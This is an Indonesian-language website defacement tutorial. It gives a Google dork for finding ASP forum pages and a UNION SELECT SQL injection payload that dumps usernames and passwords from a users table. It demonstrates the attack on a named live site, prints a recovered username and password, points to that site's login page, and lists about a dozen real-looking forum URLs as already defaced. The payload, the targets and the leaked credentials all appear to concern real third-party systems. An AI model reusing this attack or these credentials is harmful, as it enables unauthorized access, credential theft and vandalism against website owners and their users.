Dork:inurl:/forum/forums.asp?iFor=
Inject:+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
maksud dari Dork adalah query ( text )
yang diletakan pada google search
http://google.com
sehinga menjadi sepeti ini
http://www.google.co.id/search?hl=id&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=ROf&q=inurl%3A%2Fforum%2Fforums.asp%3FiFor%3D&btnG=Telusuri&meta=&aq=f&oq=
maka target untuk di deface sudah ditemukan
contoh: http://www.portugalweb.net/forum/forums.asp?iFor=16
masukan inject sehingga menjadi
http://www.portugalweb.net/forum/forums.asp?iFor=16+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
kemudian User dan Password akan muncul
untuk user terletak disebelah kiri (10 TOPICS) untuk web ini
untuk pass terletak disebelah kanannya (DATED) atau (LAST POST) di web ini
untuk sementara kita dapatkan
user: efendy
pass: ';lkjhgfds
Untuk Login web terletak di atas ada tulisan
LOGINatau di http://www.portugalweb.net/forum/login.asp
silahkan dilanjutkan...
setelah deface:
http://www.lacasadichianni.it/public/forum/messages.asp?iMsg=126&iFor=13
http://www.interstart.it/forum/messages.asp?iMsg=102&iFor=9
http://www.microlighthangar.com/forum/messages.asp?iMsg=121&iFor=21
http://www.cpbmaroc.org/Forum/messages.asp?iMsg=194&iFor=9
http://www.moragan.co.uk/businessguru/forum/messages.asp?iMsg=118&iFor=8
http://www.bentonone.org/forum/messages.asp?iMsg=158&iFor=40
http://www.otokrab.hr/forum/messages.asp?iMsg=16163&iFor=6
http://www.siamrivers.com/home/modules/forum/messages.asp?iMsg=225&iFor=17
http://english.cuc.edu.cn/forum/messages.asp?iMsg=132&iFor=16
http://www.professionalmonster.com/LifeU/messageboard/messages.asp?iMsg=124&iFor=28
http://panik.tv/forum/messages.asp?iMsg=775&iFor=18
http://www.cirt.org.uk/forum/messages.asp?iMsg=321&iFor=24